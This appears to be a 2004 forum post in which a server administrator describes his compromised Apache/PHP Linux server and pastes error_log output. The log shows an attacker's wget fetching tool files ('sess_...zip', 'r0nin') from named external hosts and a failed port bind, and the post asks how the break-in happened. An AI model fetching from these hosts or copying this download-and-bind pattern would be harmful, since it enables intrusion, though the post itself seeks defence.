Dear Experts,
My linux server is hacked by a hacker.
He replaced all my client's index pages, including sub-folders.
(It seems he can use my server to scan other's ports too, and it generated abnormal traffic, and make
my rack down.)
I am using RedHat 9.0 /Fedora Core2, apache 1.3.33, php-4.3.9
I haven't added any firewall rules, and my installation is default installation.
Do any one know how he hacked me?
it seems he hacked me using www user, i checked the error_log:
--------------------------
----------
----------
----------
----------
----------
------
--06:32:34--
http://uhuuhuhu.100free.com/sess_ffafce69943afd6b8d88aa4dbba790d3.zip => `sess_ffafce69943afd6b8d88
aa4dbba790
d3.zip'
Resolving uhuuhuhu.100free.com... 64.156.241.133
Connecting to uhuuhuhu.100free.com[64.15
6.241.133]
:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,261 [application/zip]
0K .......... ........ 100% 33.41 KB/s
06:32:37 (33.41 KB/s) - `sess_ffafce69943afd6b8d88
aa4dbba790
d3.zip' saved [19261/19261]
[Tue Dec 14 08:57:37 2004] [notice] SIGHUP received. Attempting to restart
PHP Warning: Unknown(): Unable to load dynamic library './php_gd.dll' - ./php_gd.dll: cannot open shared object file: No such file or directory in Unknown on line 0
[Tue Dec 14 08:57:38 2004] [notice] Apache/1.3.33 (Unix) PHP/4.3.9 configured -- resuming normal operations
[Tue Dec 14 08:57:38 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/suex
ec)
[Tue Dec 14 08:57:38 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Tue Dec 14 08:59:46 2004] [notice] caught SIGTERM, shutting down
chetcpasswd.cgi: Operation not permitted
chetcpasswd.cgi: Operation not permitted
--19:30:56--
http://massxpl.gratishost.com/r0nin => `r0nin'
Resolving massxpl.gratishost.com... done.
Connecting to massxpl.gratishost.com[66.
115.176.86
]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,242 [text/plain]
0K .......... ........ 100% 25.88 KB/s
19:30:58 (25.88 KB/s) - `r0nin' saved [19242/19242]
--19:30:58--
http://massxpl.gratishost.com/r0nin => `r0nin.1'
Resolving massxpl.gratishost.com... done.
Connecting to massxpl.gratishost.com[66.
115.176.86
]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,242 [text/plain]
0K .......... ........ 100% 40.32 KB/s
19:30:59 (40.32 KB/s) - `r0nin.1' saved [19242/19242]
bind: Address already in use
--------------------------
----------
----------
----------
----------
----------
------
Do you know how can I prevent him from hacking again?
Thank you.
Stanley
Start Free Trial